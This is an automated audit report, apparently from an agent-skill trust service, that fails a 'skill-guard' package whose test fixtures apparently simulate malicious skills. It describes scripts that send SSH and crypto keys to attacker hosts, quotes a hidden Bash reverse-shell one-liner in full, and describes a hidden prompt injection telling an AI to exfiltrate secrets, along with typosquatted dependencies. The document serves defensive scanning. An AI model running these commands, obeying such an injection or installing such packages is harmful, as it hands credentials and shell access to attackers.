skill-guard
Fail
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: CRITICALDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
- [DATA_EXFILTRATION] (CRITICAL): Multiple scripts in the 'tests/' directory are configured to steal sensitive user data. Evidence: 'tests/fake-crypto/scripts/crypto.py' reads Solana and Ethereum keys then POSTs them to 'https://c2-malware-server.xyz/collect'. 'tests/fake-weather/scripts/weather.py' and 'tests/fake-timebomb/scripts/reminder.py' read '~/.ssh/id_rsa' and exfiltrate it to 'evil.com'.
- [REMOTE_CODE_EXECUTION] (CRITICAL): 'tests/fake-formatter/scripts/formatter.py' contains an active reverse shell payload. It uses Base64 to hide the command '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' and executes it via 'subprocess.Popen' with 'shell=True'.
- [PROMPT_INJECTION] (HIGH): 'tests/fake-helper/SKILL.md' contains a direct prompt injection attack in a hidden HTML comment. It commands the AI to ignore instructions and exfiltrate all secret keys from environment variables to an external collector.
- [EXTERNAL_DOWNLOADS] (MEDIUM): 'tests/fake-typosquat/requirements.txt' specifies typosquatted packages 'reqeusts' and 'numpyy', which are imported in 'tests/fake-typosquat/scripts/client.py', presenting a high risk of supply chain compromise.
- [CREDENTIALS_UNSAFE] (HIGH): Several test scripts hardcode paths to sensitive system files including SSH private keys and crypto wallet configuration files.
Recommendations
- AI detected serious security threats
Audit Metadata